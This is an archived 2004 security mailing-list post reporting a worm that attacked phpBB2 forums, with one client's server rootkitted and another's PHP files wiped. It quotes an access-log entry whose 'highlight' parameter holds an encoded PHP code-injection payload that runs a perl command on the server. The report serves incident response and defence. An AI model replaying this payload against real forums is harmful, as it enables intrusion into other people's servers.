Network Security: Detailed info on RE: Worm hitting PHPbb2 Forums

Subject:	RE: Worm hitting PHPbb2 Forums
Date:	Tue, 21 Dec 2004 12:46:30 -0500

In addition to your post here is some more info.  

http://isc.sans.org/


-----Original Message-----
From: L. Walker [mailto:lwalker@magi.net.au] 
Sent: Tuesday, December 21, 2004 4:23 AM
To: incidents@securityfocus.com
Cc: full-disclosure@lists.netsys.com
Subject: Worm hitting PHPbb2 Forums
Importance: High

Just spotted two clients hit by this.  One client didnt update his
software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16. 
Chkrootkit says its Adore, however could be something else.  Datacenter
wasn't very smart and has since wiped the server, so no binaries or other
evidence.

Generation 12 only wiped out PHP files, replacing them with its own
message on other client's PHPbb2 forum.  Access logs show:

66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%
2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%
252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%2
52echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252
echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252ec
hr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252ec
hr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252ech
r(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252ec
hr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr
(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr
(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34
))%252e%2527
HTTP/1.0" 200 270
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2
aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)
%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%2
52echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%2
52echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252e
chr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252e
chr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252ec
hr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252e
chr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252ech
r(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr
(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(
78)%252echr(41)%252echr(34))%252e%2527"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

--
L. Walker <lwalker at magi dot net dot au>
Network Administrator / Consultant
--

<Prev in Thread]	Current Thread	[Next in Thread>
Worm hitting PHPbb2 Forums, L. Walker Re: Worm hitting PHPbb2 Forums, mark Re: Worm hitting PHPbb2 Forums, Chris Ess Re: Worm hitting PHPbb2 Forums, lists Re: Worm hitting PHPbb2 Forums, Chris Ess Re: Worm hitting PHPbb2 Forums, lists Re: Worm hitting PHPbb2 Forums, Barrie Dempster RE: Worm hitting PHPbb2 Forums, Christopher Adickes <= RE: Worm hitting PHPbb2 Forums, Mike [Full-Disclosure] RE: Worm hitting PHPbb2 Forums, M. Shirk

Previous by Date:	Worm hitting PHPbb2 Forums, L. Walker
Next by Date:	Re: SSH scans..., skippy1
Previous by Thread:	Re: Worm hitting PHPbb2 Forums, Barrie Dempster
Next by Thread:	RE: Worm hitting PHPbb2 Forums, Mike
Indexes:	[Date] [Thread] [Top] [All Lists]